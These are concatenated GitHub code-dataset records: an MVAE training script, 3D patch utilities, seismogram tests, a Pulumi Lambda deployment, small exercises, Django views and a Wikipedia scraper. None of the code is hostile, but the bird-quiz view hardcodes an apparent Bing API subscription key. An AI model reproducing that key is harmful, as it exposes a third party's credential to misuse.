ValueError(\"Target size ({}) must be the same as input size ({})\".format(\n target.size(), input.size()))\n\n return (torch.clamp(input, 0) - input * target \n + torch.log(1 + torch.exp(-torch.abs(input))))\n\n\ndef tensor_2d_to_list(x):\n # convert a 2D tensor to a list of 1D tensors.\n n_dims = x.size(1)\n list_of_tensors = []\n for i in xrange(n_dims):\n list_of_tensors.append(x[:, i])\n return list_of_tensors\n\n\ndef enumerate_combinations(n):\n \"\"\"Enumerate entire pool of combinations.\n \n We use this to define the domain of ELBO terms, \n (the pool of 2^19 ELBO terms).\n\n @param n: integer\n number of features (19 for Celeb19)\n @return: a list of ALL permutations\n \"\"\"\n combos = []\n for i in xrange(2, n): # 1 to n - 1\n _combos = list(combinations(range(n), i))\n combos += _combos\n\n combos_np = np.zeros((len(combos), n))\n for i in xrange(len(combos)):\n for idx in combos[i]:\n combos_np[i][idx] = 1\n\n combos_np = combos_np.astype(np.bool)\n return combos_np\n\n\ndef sample_combinations(pool, size=1):\n \"\"\"Return boolean list of which data points to use to compute a modality.\n Ignore combinations that are all True or only contain a single True.\n\n @param pool: np.array\n enumerating all possible combinations.\n @param size: integer (default: 1)\n number of combinations to sample.\n \"\"\"\n n_modalities = pool.shape[1]\n pool_size = len(pool)\n pool_sums = np.sum(pool, axis=1)\n pool_dist = np.bincount(pool_sums)\n pool_space = np.where(pool_dist > 0)[0]\n\n sample_pool = np.random.choice(pool_space, size, replace=True)\n sample_dist = np.bincount(sample_pool)\n if sample_dist.size < n_modalities:\n zeros_pad = np.zeros(n_modalities - sample_dist.size).astype(np.int)\n sample_dist = np.concatenate((sample_dist, zeros_pad))\n \n sample_combo = []\n for ix in 
xrange(n_modalities):\n if sample_dist[ix] > 0:\n pool_i = pool[pool_sums == ix]\n combo_i = np.random.choice(range(pool_i.shape[0]), \n size=sample_dist[ix], \n replace=False)\n sample_combo.append(pool_i[combo_i])\n\n sample_combo = np.concatenate(sample_combo)\n return sample_combo\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\ndef save_checkpoint(state, is_best, folder='./', filename='checkpoint.pth.tar'):\n if not os.path.isdir(folder):\n os.mkdir(folder)\n torch.save(state, os.path.join(folder, filename))\n if is_best:\n shutil.copyfile(os.path.join(folder, filename),\n os.path.join(folder, 'model_best.pth.tar'))\n\n\ndef load_checkpoint(file_path, use_cuda=False):\n checkpoint = torch.load(file_path) if use_cuda else \\\n torch.load(file_path, map_location=lambda storage, location: storage)\n model = MVAE(checkpoint['n_latents'])\n model.load_state_dict(checkpoint['state_dict'])\n return model\n\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--n-latents', type=int, default=100,\n help='size of the latent embedding [default: 100]')\n parser.add_argument('--batch-size', type=int, default=100, metavar='N',\n help='input batch size for training [default: 100]')\n parser.add_argument('--epochs', type=int, default=100, metavar='N',\n help='number of epochs to train [default: 100]')\n parser.add_argument('--annealing-epochs', type=int, default=20, metavar='N',\n help='number of epochs to anneal KL for [default: 20]')\n parser.add_argument('--lr', type=float, default=1e-4, metavar='LR',\n help='learning rate [default: 1e-4]')\n parser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status [default: 10]')\n parser.add_argument('--approx-m', type=int, default=1,\n help='number of ELBO terms to approx. the full MVAE objective [default: 1]')\n parser.add_argument('--lambda-image', type=float, default=1.,\n help='multipler for image reconstruction [default: 1]')\n parser.add_argument('--lambda-attrs', type=float, default=10.,\n help='multipler for attributes reconstruction [default: 10]')\n parser.add_argument('--cuda', action='store_true', default=False,\n help='enables CUDA training [default: False]')\n args = parser.parse_args()\n args.cuda = args.cuda and torch.cuda.is_available()\n\n if not os.path.isdir('./trained_models'):\n os.makedirs('./trained_models')\n\n # crop the input image to 64 x 64\n preprocess_data = transforms.Compose([transforms.Resize(64),\n transforms.CenterCrop(64),\n transforms.ToTensor()])\n\n train_loader = torch.utils.data.DataLoader(\n CelebAttributes(partition='train', data_dir='./data',\n image_transform=preprocess_data),\n batch_size=args.batch_size, shuffle=True)\n N_mini_batches = len(train_loader)\n test_loader = torch.utils.data.DataLoader(\n CelebAttributes(partition='val', data_dir='./data',\n image_transform=preprocess_data),\n batch_size=args.batch_size, shuffle=False)\n\n model = MVAE(args.n_latents)\n optimizer = optim.Adam(model.parameters(), lr=args.lr)\n \n if args.cuda:\n model.cuda()\n\n # enumerate all combinations so we can sample from this\n # every gradient step. 
NOTE: probably not the most efficient\n # way to do this but oh well.\n combination_pool = enumerate_combinations(19)\n\n\n def train(epoch):\n model.train()\n train_loss_meter = AverageMeter()\n\n for batch_idx, (image, attrs) in enumerate(train_loader):\n if epoch < args.annealing_epochs:\n # compute the KL annealing factor for the current mini-batch in the current epoch\n annealing_factor = (float(batch_idx + (epoch - 1) * N_mini_batches + 1) /\n float(args.annealing_epochs * N_mini_batches))\n else:\n # by default the KL annealing factor is unity\n annealing_factor = 1.0\n\n if args.cuda:\n image = image.cuda()\n attrs = attrs.cuda()\n image = Variable(image)\n attrs = Variable(attrs)\n attrs = tensor_2d_to_list(attrs) # convert tensor to list\n batch_size = len(image)\n\n # refresh the optimizer\n optimizer.zero_grad()\n\n train_loss = 0 # accumulate train loss here so we don't store a lot of things.\n n_elbo_terms = 0 # track number of ELBO terms\n\n # compute ELBO using all data (``complete\")\n recon_image, recon_attrs, mu, logvar = model(image, attrs)\n train_loss += elbo_loss([recon_image] + recon_attrs, [image] + attrs, mu, logvar, \n lambda_image=args.lambda_image, lambda_attrs=args.lambda_attrs,\n annealing_factor=annealing_factor)\n n_elbo_terms += 1 # keep track of how many terms there are\n\n # compute ELBO using only image data\n recon_image, _, mu, logvar = model(image=image)\n train_loss += elbo_loss([recon_image], [image], mu, logvar, \n lambda_image=args.lambda_image, lambda_attrs=args.lambda_attrs,\n annealing_factor=annealing_factor)\n n_elbo_terms += 1 # keep track of how many terms there are\n \n # compute ELBO using only text data\n for ix in xrange(len(attrs)):\n _, recon_attrs, mu, logvar = model(attrs=[attrs[k] if k == ix else None \n for k in xrange(len(attrs))])\n train_loss += elbo_loss([recon_attrs[ix]], [attrs[ix]], mu, logvar, \n annealing_factor=annealing_factor)\n n_elbo_terms += 1\n\n # sample some number of terms\n if args.approx_m > 0:\n sample_combos = sample_combinations(combination_pool, size=args.approx_m)\n for sample_combo in sample_combos:\n attrs_combo = sample_combo[1:]\n recon_image, recon_attrs, mu, logvar = model(image=image if sample_combo[0] else None, \n attrs=[attrs[ix] if attrs_combo[ix] else None \n for ix in xrange(attrs_combo.size)])\n if sample_combo[0]: # check if image is present\n elbo = elbo_loss([recon_image] + [recon_attrs[ix] for ix in xrange(attrs_combo.size) if attrs_combo[ix]],\n [image] + [attrs[ix] for ix in xrange(attrs_combo.size) if attrs_combo[ix]],\n mu, logvar, annealing_factor=annealing_factor)\n else:\n elbo = elbo_loss([recon_attrs[ix] for ix in xrange(attrs_combo.size) if attrs_combo[ix]],\n [attrs[ix] for ix in xrange(attrs_combo.size) if attrs_combo[ix]],\n mu, logvar, annealing_factor=annealing_factor)\n train_loss += elbo\n n_elbo_terms += 1\n\n assert n_elbo_terms == (len(attrs) + 1) + 1 + args.approx_m # N + 1 + M\n train_loss_meter.update(train_loss.data[0], len(image))\n \n # compute and take gradient step\n train_loss.backward()\n optimizer.step()\n\n if batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}\\tAnnealing-Factor: {:.3f}'.format(\n epoch, batch_idx * batch_size, len(train_loader.dataset),\n 100. 
* batch_idx / len(train_loader), train_loss_meter.avg, annealing_factor))\n\n        print('====> Epoch: {}\\tLoss: {:.4f}'.format(epoch, train_loss_meter.avg))\n\n\n    def test(epoch):\n        model.eval()\n        test_loss = 0\n\n        # for simplicity, here I'm only going to track the joint loss. \n        pbar = tqdm(total=len(test_loader))\n        for batch_idx, (image, attrs) in enumerate(test_loader):\n            if args.cuda:\n                image, attrs = image.cuda(), attrs.cuda()\n            image = Variable(image, volatile=True)\n            attrs = Variable(attrs, volatile=True)\n            batch_size = image.size(0)\n            attrs = tensor_2d_to_list(attrs)\n            # compute the elbo using all data.\n            recon_image, recon_attrs, mu, logvar = model(image, attrs)\n            test_loss += elbo_loss([recon_image] + recon_attrs, [image] + attrs, mu, logvar).data[0]\n            pbar.update()\n\n        pbar.close()\n        test_loss /= len(test_loader)\n        print('====> Test Loss: {:.4f}'.format(test_loss))\n        return test_loss\n\n\n    best_loss = sys.maxint\n    for epoch in range(1, args.epochs + 1):\n        train(epoch)\n        loss = test(epoch)\n        is_best = loss < best_loss\n        best_loss = min(loss, best_loss)\n        # save the best model and current model\n        save_checkpoint({\n            'state_dict': model.state_dict(),\n            'best_loss': best_loss,\n            'n_latents': args.n_latents,\n            'optimizer' : optimizer.state_dict(),\n        }, is_best, folder='./trained_models') \n","repo_name":"mhw32/multimodal-vae-public","sub_path":"celeba19/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14718,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"50"} +{"seq_id":"228731882","text":"import numpy as np \nimport random\nimport config as cf\ndef resize_by_padding(volume, size_to_reshape=(256,256,256)):\n\t\"\"\"\n\tResizes the given volume by zero padding to get the size_to_reshape\n\t---------------------\n\tParams: \n\tvolume - Numpy array\n\tsize_to_reshape - Tuple of size\n\t---------------------\n\tOutput:\n\tNumpy array with the shape of size_to_reshape having the appropriate zero padding\n\t\"\"\"\n\n\tin_shape = list(volume.shape)\n\tout_shape = list(size_to_reshape)\n\n\tif out_shape[0]<in_shape[0] or out_shape[1]<in_shape[1] or out_shape[2]<in_shape[2]:\n\t\traise Exception(\"The requested size to pad to is smaller than the input volume\")\n\tpad_widths = [(0, out_shape[i] - in_shape[i]) for i in range(len(in_shape))]\n\tpadded_volume = np.pad(volume, pad_widths, mode='constant')\n\n\treturn padded_volume\ndef extract_volume(volume, shape_to_extract=(128,128,128)):\n\t\"\"\"\n\tExtracts a sub-volume of shape_to_extract from the given volume, starting at the origin\n\t---------------------\n\tParams: \n\tvolume - Numpy array\n\tshape_to_extract - Tuple of size\n\t---------------------\n\tOutput:\n\tNumpy array with the shape of shape_to_extract\n\t\"\"\"\n\n\tin_shape = list(volume.shape)\n\tout_shape = list(shape_to_extract)\n\n\tif out_shape[0]>in_shape[0] or out_shape[1]>in_shape[1] or out_shape[2]>in_shape[2]:\n\t\traise Exception(\"The requested volume to be extracted is bigger than the input volume\")\t\n\textracted_volume = volume[:out_shape[0], :out_shape[1], :out_shape[2]]\n\n\treturn extracted_volume\ndef _no_of_patches(in_shape, patch_size, stride_size):\n\t\"\"\"\n\tGet the number of patches that can be extracted from the volume given the patch size and stride size\n\t-------------------\n\tParams:\n\tin_shape - Shape of the input volume as a List\n\tpatch_size - Size of patch as a List\n\tstride_size - Stride as a list\n\t-------------------\n\tOutput: no of patches as a list\n\t\"\"\"\n\tno_of_patches = []\n\n\tfor i in range(len(in_shape)):\n\t\tno_of_patches.append(((in_shape[i] - patch_size[i])//stride_size[i]) + 1)\n\n\treturn no_of_patches\ndef generate_patch_volumes(volume, patch_size=(128,128,128), stride_size=(32,32,32)):\n\t\"\"\"\n\tGiven a 3d volume, creates a list of patches according to the patch size and the stride size given as an input\n\t-------------------\n\tParams:\n\tvolume: Numpy array\n\tpatch_size: tuple indicating the size of patches to extract\n\tstride_size: tuple indicating the stride to move by when extracting the patches\n\t-------------------\n\tOutput:\n\tList of patch volumes (numpy arrays)\n\t\"\"\"\n\n\tin_shape = list(volume.shape)\n\tpatch_size = list(patch_size)\n\tstride_size = list(stride_size)\n\n\tno_of_patches = _no_of_patches(in_shape, patch_size, 
stride_size)\n\n\tlist_of_patches = []\n\n\tfor i in range(no_of_patches[0]):\n\t\tfor j in range(no_of_patches[1]):\n\t\t\tfor k in range(no_of_patches[2]):\n\n\t\t\t\t# slice off the patch origin first, then extract the patch from it\n\t\t\t\ttemp_vol = volume[stride_size[0]*i:, stride_size[1]*j:, stride_size[2]*k:]\n\t\t\t\ttemp_extracted = extract_volume(temp_vol, shape_to_extract=patch_size)\n\t\t\t\tlist_of_patches.append(temp_extracted)\n\n\treturn list_of_patches\n\n\ndef generate_patch_startid_list(volume_shape=(256,256,160), patch_size=(128,128,128), stride_size=(32,32,32)):\n\t\"\"\"\n\tGiven a 3d volume shape, creates a list of patch start indices according to the patch size and the stride size given as an input\n\t-------------------\n\tParams:\n\tvolume_shape: tuple indicating the shape of the volume\n\tpatch_size: tuple indicating the size of patches to extract\n\tstride_size: tuple indicating the stride to move by when extracting the patches\n\t-------------------\n\tOutput:\n\tList containing the start ids (tuples) of all possible patches\n\t\"\"\"\n\n\tin_shape = list(volume_shape)\n\tpatch_size = list(patch_size)\n\tstride_size = list(stride_size)\n\n\tno_of_patches = _no_of_patches(in_shape, patch_size, stride_size)\n\n\tlist_patch_startidx = []\n\tfor i in range(no_of_patches[0]):\n\t\tfor j in range(no_of_patches[1]):\n\t\t\tfor k in range(no_of_patches[2]):\n\n\t\t\t\ttemp_start_idx = (stride_size[0]*i, stride_size[1]*j, stride_size[2]*k)\n\t\t\t\tlist_patch_startidx.append(temp_start_idx)\n\treturn list_patch_startidx\n\n\n\ndef get_patch(volume, patch_size, patch_start_idx):\n\t\"\"\"\n\tReturn the patch of volume \n\t---------------\n\tParams:\n\tvolume: Np array of input vol\n\tpatch_size: tuple of patch size\n\tpatch_start_idx: The starting voxel of the patch\n\t--------------\n\tOutput:\n\tNp array of volume of the requested patch\n\t\"\"\"\n\n\ttemp_vol = volume[patch_start_idx[0]:, patch_start_idx[1]:, patch_start_idx[2]:]\n\tpatch_volume = extract_volume(temp_vol, shape_to_extract=patch_size)\n\treturn patch_volume\n\ndef convert_to_one_hot(volume, labels=cf.DATA_LABELS_DICT):\n\t\"\"\"\n\tConverts the label map to a one-hot encoded matrix\n\t---------------\n\tParams:\n\tVolume: Np array of label map\n\tLabels: Dict of class names and values in the label map\n\t---------------\n\tOutput:\n\tOne hot encoded matrix with shape (*dim, channels)\n\t\"\"\"\n\t#print(\"Label convention: \",labels)\n\tno_channels = len(labels)\n\tone_hot_label = np.zeros((*volume.shape, no_channels))\n\n\tfor i,label in enumerate(labels):\n\t\tone_hot_label[volume.astype(int)==labels[label],i] = 1\n\n\treturn one_hot_label\n\ndef is_valid_patch(volume,no_label_pixels = cf.LABEL_PIXELS_THRESHOLD):\n\t\"\"\"\n\tTo know if a patch of volume is valid. 
The condition to satisfy for a valid patch is \n\tnon zero elements of volume should be >= LABEL_PIXELS_THRESHOLD\n\t-------------------\n\tOutput:\n\tTrue or False\n\t\"\"\"\n\n\tnon_zero_voxels = np.count_nonzero(volume)\n\tif non_zero_voxels < no_label_pixels:\n\t\treturn False\n\treturn True\n\n    def test_create_instance(self) -> None:\n        \"\"\"Test creating an instance.\"\"\"\n\n        miniseis = MiniSeismogram()\n        assert isinstance(miniseis, MiniSeismogram)\n        assert isinstance(miniseis, Seismogram)\n\n    @pytest.mark.depends(name=\"test_create_instance\")\n    def test_defaults(self) -> None:\n        \"\"\"Test default attributes.\"\"\"\n\n        miniseis = MiniSeismogram()\n        assert miniseis.begin_time.year == SEISMOGRAM_DEFAULTS.begin_time.year == 1970\n        assert miniseis.begin_time.month == SEISMOGRAM_DEFAULTS.begin_time.month == 1\n        assert miniseis.begin_time.day == SEISMOGRAM_DEFAULTS.begin_time.day == 1\n        assert miniseis.begin_time.hour == SEISMOGRAM_DEFAULTS.begin_time.hour == 0\n        assert miniseis.begin_time.minute == SEISMOGRAM_DEFAULTS.begin_time.minute == 0\n        assert miniseis.begin_time.second == SEISMOGRAM_DEFAULTS.begin_time.second == 0\n        assert (\n            miniseis.begin_time.microsecond\n            == SEISMOGRAM_DEFAULTS.begin_time.microsecond\n            == 0\n        )\n        assert miniseis.delta == SEISMOGRAM_DEFAULTS.delta == 1\n        assert miniseis.data.size == 0\n        assert len(miniseis) == 0\n\n    @pytest.mark.depends(name=\"test_create_instance\")\n    def test_change_attributes(self) -> None:\n        miniseis = MiniSeismogram()\n        random_data = np.random.rand(1000)\n        new_time = datetime.fromisoformat(\"2011-11-04T00:05:23.123\")\n        miniseis.data = random_data\n        assert miniseis.data.all() == random_data.all()\n        assert miniseis.end_time - miniseis.begin_time == timedelta(\n            seconds=miniseis.delta * (len(miniseis) - 1)\n        )\n        miniseis.begin_time = new_time\n        assert miniseis.begin_time == new_time\n        assert miniseis.end_time - miniseis.begin_time == timedelta(\n            seconds=miniseis.delta * (len(miniseis) - 1)\n        )\n        miniseis.delta = 0.1\n        assert miniseis.delta == 0.1\n        assert miniseis.end_time - miniseis.begin_time == timedelta(\n            seconds=miniseis.delta * (len(miniseis) - 1)\n        )\n\n    @pytest.mark.depends(name=\"test_change_attributes\")\n    def test_as_seismogram(self) -> None:\n        \"\"\"Check that it works in a function for Seismogram types.\"\"\"\n\n        def seis_func(seismogram: Seismogram) -> None:\n            _ = len(seismogram)\n            _ = np.mean(seismogram.data)\n            _ = seismogram.delta * 1.1\n            _ = seismogram.begin_time + timedelta(seconds=12)\n            _ = seismogram.end_time + timedelta(seconds=12)\n\n        miniseis = MiniSeismogram(data=np.random.rand(1000))\n        seis_func(miniseis)\n\n\nclass TestMiniSeismogramMethods:\n    @pytest.fixture\n    def mini_seismogram(self) -> MiniSeismogram:\n        return MiniSeismogram(data=np.random.rand(1000))\n\n    def test_clone(self) -> None:\n        # create sac seismogram and add data\n        data = np.random.rand(1000)\n        sac_seis = SAC().seismogram\n        sac_seis.data = data\n        sac_seis.delta = 0.1\n        sac_seis.begin_time = datetime.now(timezone.utc)\n\n        # clone and check attributes are identical\n        mini_seis = MiniSeismogram.clone(sac_seis)\n        npt.assert_allclose(sac_seis.data, mini_seis.data)\n        assert sac_seis.data is not mini_seis.data\n        assert sac_seis.begin_time == mini_seis.begin_time\n        assert sac_seis.begin_time is not mini_seis.begin_time\n        assert sac_seis.delta == mini_seis.delta\n        assert sac_seis.end_time == mini_seis.end_time\n\n        # verify changes in clone don't affect input seismogram\n        mini_seis.data[0] *= 2\n        with npt.assert_raises(AssertionError):\n            npt.assert_allclose(sac_seis.data, mini_seis.data)\n        mini_seis.begin_time = datetime.now(timezone.utc)\n        assert 
sac_seis.begin_time != mini_seis.begin_time\n mini_seis.delta *= 2\n assert sac_seis.delta != mini_seis.delta\n assert sac_seis.end_time != mini_seis.end_time\n\n # create clone without data\n mini_seis = MiniSeismogram.clone(sac_seis, skip_data=True)\n npt.assert_allclose(mini_seis.data, np.array([]))\n\n def test_normalize(self, mini_seismogram: MiniSeismogram) -> None:\n mini_seismogram.normalize()\n assert np.max(mini_seismogram.data) <= 1\n\n def test_detrend(self, mini_seismogram: MiniSeismogram) -> None:\n mini_seismogram.detrend()\n assert 0 == pytest.approx(np.mean(mini_seismogram.data), abs=1e-11)\n\n def test_resample(self, mini_seismogram: MiniSeismogram) -> None:\n old_delta = mini_seismogram.delta\n old_len = len(mini_seismogram)\n new_delta = old_delta * 2\n mini_seismogram.resample(new_delta)\n assert len(mini_seismogram) * 2 == old_len\n assert mini_seismogram.delta == new_delta\n","repo_name":"pysmo/pysmo","sub_path":"tests/classes/mini/test_mini_seismogram.py","file_name":"test_mini_seismogram.py","file_ext":"py","file_size_in_byte":5030,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"50"} +{"seq_id":"16251738520","text":"import json\n\nfrom pulumi_aws import iam, lambda_, s3\nimport pulumi\nfrom pulumi import Output\n\nfrom modules.s3 import bucket\nfrom modules.iam import LAMBDA_ASSUME_ROLE_POLICY\nfrom modules.iam import CREATE_CW_LOGS_POLICY\nfrom modules.sns import sns_topic\nfrom modules.sns import weapons_topic\nfrom modules.kinesis import chat_stream\nfrom modules.s3 import bucket\nfrom modules.sqs import gods_queue\nfrom modules.dynamodb import dynamodb_table\nfrom modules.layers import dependency_layer\n\n\nMODULE_NAME = \"morgue-bot\"\n\nconfig = pulumi.Config()\n\n\nrole = iam.Role(\n f\"{MODULE_NAME}-lambda-role\",\n assume_role_policy=json.dumps(LAMBDA_ASSUME_ROLE_POLICY),\n)\n\npolicy = Output.all(\n bucket.arn, sns_topic.arn, weapons_topic.arn, dynamodb_table.arn, chat_stream.arn\n).apply(\n lambda args: json.dumps(\n {\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n CREATE_CW_LOGS_POLICY,\n {\"Effect\": \"Allow\", \"Action\": [\"s3:Get*\"], \"Resource\": args[0]},\n {\n \"Effect\": \"Allow\",\n \"Action\": [\"sns:Publish\"],\n \"Resource\": [args[1], args[2]],\n },\n {\n \"Effect\": \"Allow\",\n \"Action\": [\n \"dynamodb:scan\",\n \"dynamodb:GetItem\",\n \"dynamodb:PutItem\",\n \"dynamodb:UpdateItem\",\n ],\n \"Resource\": args[3],\n },\n {\n \"Effect\": \"Allow\",\n \"Action\": [\"kinesis:PutRecord\"],\n \"Resource\": args[4],\n },\n ],\n }\n )\n)\n\niam.RolePolicyAttachment(\n f\"{MODULE_NAME}-xray\",\n policy_arn=\"arn:aws:iam::aws:policy/AWSXrayWriteOnlyAccess\",\n role=role.id,\n)\n\niam.RolePolicy(f\"{MODULE_NAME}-lambda-role-policy\", role=role.id, policy=policy)\n\nlambda_variables = Output.all(\n dynamodb_table.name, bucket.id, chat_stream.arn, chat_stream.name, sns_topic.arn\n).apply(\n lambda args: {\n \"CHARACTER_DB\": args[0],\n \"MORGUE_BUCKETNAME\": args[1],\n \"CHAT_STREAM_ARN\": args[2],\n \"CHAT_STREAM_NAME\": args[3],\n \"TOPIC_ARN\": args[4],\n }\n)\n\naws_lambda = lambda_.Function(\n f\"{MODULE_NAME}\",\n role=role.arn,\n runtime=\"python3.6\",\n handler=\"lambda_handler.morgue_bot\",\n s3_key=config.require(\"artifact_name\"),\n s3_bucket=\"morgue-artifacts\",\n timeout=200,\n tracing_config={\"mode\": \"Active\"},\n environment={\"variables\": lambda_variables},\n layers=[dependency_layer.arn],\n)\n\nlambda_.Permission(\n \"AllowInvocationFromMorgueFileBucket\",\n 
action=\"lambda:InvokeFunction\",\n    function=aws_lambda.arn,\n    principal=\"s3.amazonaws.com\",\n    source_arn=bucket.arn,\n)\n\ns3.BucketNotification(\n    f\"{MODULE_NAME}-new-morgue-files\",\n    bucket=bucket.id,\n    lambda_functions=[\n        {\"events\": [\"s3:ObjectCreated:*\"], \"lambda_function_arn\": aws_lambda.arn}\n    ],\n)\n","repo_name":"davidbegin/morguebot","sub_path":"deploy/modules/morgue_bot_lambda.py","file_name":"morgue_bot_lambda.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"50"} +{"seq_id":"3569217003","text":"'''\nWe will write the Fibonacci series with a for loop.\nIt goes like fibonacci = 1 1 2 3 5 8 13...\n'''\n\na = 1\nb = 1\n\nfibonacci = [a,b]\n\nfor x in range(20):\n    a,b = b,a+b\n    print(\"a: {} b: {}\".format(a,b))\n    fibonacci.append(b)\n\nprint(fibonacci)","repo_name":"SametZenginx/MyPythonProject","sub_path":"3-Loop-structures/Fibonacci series with for loop.py","file_name":"Fibonacci series with for loop.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"17811688308","text":"import re\n\nnumber_of_bosses = int(input())\n\nfor boss in range(number_of_bosses):\n    data = input()\n    pattern = r\"\\|([A-Z]{4,})\\|:#([a-zA-Z]+ [a-zA-Z]+)#\"\n\n    matches = re.findall(pattern, data)\n\n    if matches:\n        print(f\"{matches[0][0]}, The {matches[0][1]}\")\n    else:\n        print(\"Access denied!\")\n\n    other_matches = re.finditer(pattern, data)\n\n    for match in other_matches:\n        print(f\">> Strength: {len(match.group(1))}\")\n        print(f\">> Armor: {len(match.group(2))}\")\n\n\n\n","repo_name":"giorno39/softuni_fund_python","sub_path":"last_exam/boss_rush.py","file_name":"boss_rush.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"31008244497","text":"from django.shortcuts import render, get_object_or_404\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Requested_document,Complaint,Suggestion\nfrom django.db import models\n\nUser = get_user_model()\n\n@login_required\ndef requested_doc(request):\n\tcontext = {\n\t\t'documents': Requested_document.objects.all()\n\t}\n\treturn render(request,'Requested_docs.html',context)\n\n@login_required\ndef sent_complaint(request):\n\tcontext = {\n\t\t'complaints': Complaint.objects.all()\n\t}\n\treturn render(request,'recieved-complaints.html',context)\n\n@login_required\ndef sent_suggestion(request):\n\tcontext = {\n\t\t'suggestions': Suggestion.objects.all()\n\t}\n\treturn render(request,'recieved-suggestions.html',context)","repo_name":"TrellixVulnTeam/E-barangay_OVR5","sub_path":"djangoproject/Services/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"22346027667","text":"from django.shortcuts import get_object_or_404, render\nfrom django.http import HttpResponse\n\nfrom .models import Bird, Group\n\nimport json, http.client, urllib.request, urllib.parse, urllib.error, base64, random\n\n\ndef index(request):\n    headers = {\n        # Request headers\n        'Ocp-Apim-Subscription-Key': '52e1f43aa3114e8b924af3f84693877b',\n    }\n\n\n\n    result_id = random.randrange(10)\n    random_index = 0#random.randint(0, Bird.objects.count() - 1)\n    correct_bird = Bird.objects.all()[random_index].common_name\n    
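The boss_rush record above runs the same pattern through re.findall (which yields tuples of group strings) and re.finditer (which yields match objects exposing group lengths). A small sketch with an assumed sample line, showing both views of the same capture groups:

import re

pattern = r"\|([A-Z]{4,})\|:#([a-zA-Z]+ [a-zA-Z]+)#"
data = "|AZAZEL|:#Shadow Master#"  # hypothetical sample line

# findall returns one tuple of group strings per match...
for name, title in re.findall(pattern, data):
    print(f"{name}, The {title}")

# ...while finditer returns match objects, so group lengths are available.
for match in re.finditer(pattern, data):
    print(f">> Strength: {len(match.group(1))}")
    print(f">> Armor: {len(match.group(2))}")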
correct_index = random.randint(0, 4)\n    wrong_indices = []\n    choices = []\n\n    for i in range(0,4):\n        found_unique = False\n        while not found_unique:\n            check_index = random.randint(0, Bird.objects.count() - 1)\n            if (check_index != random_index) and not (check_index in wrong_indices):\n                wrong_indices.append(check_index)\n                found_unique = True\n        choices.append(Bird.objects.all()[check_index].common_name)\n\n\n    choices.insert(correct_index, correct_bird)\n\n    bird_groups = [g.name for g in Group.objects.filter()]\n\n    params = urllib.parse.urlencode({\n        # Request parameters\n        'q': correct_bird,\n        'count': '10',\n        'offset': '0',\n        'mkt': 'en-us',\n        'safeSearch': 'Moderate',\n    })\n\n    img_url = \"\"\n\n\n    try:\n        conn = http.client.HTTPSConnection('api.cognitive.microsoft.com')\n        conn.request(\"GET\", \"/bing/v5.0/images/search?%s\" % params, \"{body}\", headers)\n        response = conn.getresponse()\n        data = response.read().decode('utf-8')\n        parsed_data = json.loads(data)\n        img_url = (parsed_data['value'][result_id]['thumbnailUrl'])\n        conn.close()\n    except Exception as e:\n        print(\"Error: {0}\".format(e))  # a generic Exception has no errno/strerror attributes\n\n    context = {\n        'bird_groups' : bird_groups,\n        'choices' : choices,\n        'correct_index' : correct_index,\n        'img_url' : img_url,\n    }\n    return render(request, 'bird_quiz/index.html', context)\n\ndef question(request):\n    return HttpResponse(\"You're looking at a question\")\n\n\n","repo_name":"MBAustin/bird_is_the_word","sub_path":"bird_quiz/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"39351812118","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nimport re\r\nimport logging\r\nimport json\r\n\r\nclass Movie(object):\r\n    name = \"\"\r\n    year = 0\r\n    gross = 0\r\n    actors = []\r\n    \r\nlogging.basicConfig(filename='WebScraper.log',level=logging.DEBUG)\r\n\r\n#lists to hold data, movies are in an object, actors are tuple\r\nall_movies=[]\r\nall_actors=[]\r\njson_actors=[]\r\njson_movies=[]\r\nmoviedict={}\r\nactordict={}\r\n\r\nurl = \"https://en.wikipedia.org/wiki/Morgan_Freeman\"\r\n\r\nr = requests.get(url)\r\ndata = r.content\r\nsoup = BeautifulSoup(data, 'html.parser')\r\ntags = soup.find('div',{'class' : 'div-col columns column-width'})\r\nlink = tags.findAll('a')\r\n\r\nfor ele in link:\r\n    all_movies.append(ele.get('href'))\r\n    #print(ele.get('href'))\r\nlogging.info(\"First of three starter pages parsed, all movies added\")\r\nurl = \"https://en.wikipedia.org/wiki/Johnny_Depp\"\r\n\r\nr = requests.get(url)\r\ndata = r.content\r\nsoup = BeautifulSoup(data, 'html.parser')\r\ntags = soup.find('div',{'class' : 'div-col columns column-width'})\r\nlink = tags.findAll('a')\r\n\r\nfor ele in link:\r\n    all_movies.append(ele.get('href'))\r\n    #print(ele.get('href'))\r\nlogging.info(\"Second of three starter pages parsed, all movies added\")\r\nurl = \"https://en.wikipedia.org/wiki/Adam_Sandler\"\r\n\r\nr = requests.get(url)\r\ndata = r.content\r\nsoup = BeautifulSoup(data, 'html.parser')\r\ntags = soup.find('div',{'class' : 'div-col columns column-count column-count-2'})\r\nlink = tags.findAll('a')\r\n\r\nfor ele in link:\r\n    all_movies.append(ele.get('href'))\r\n    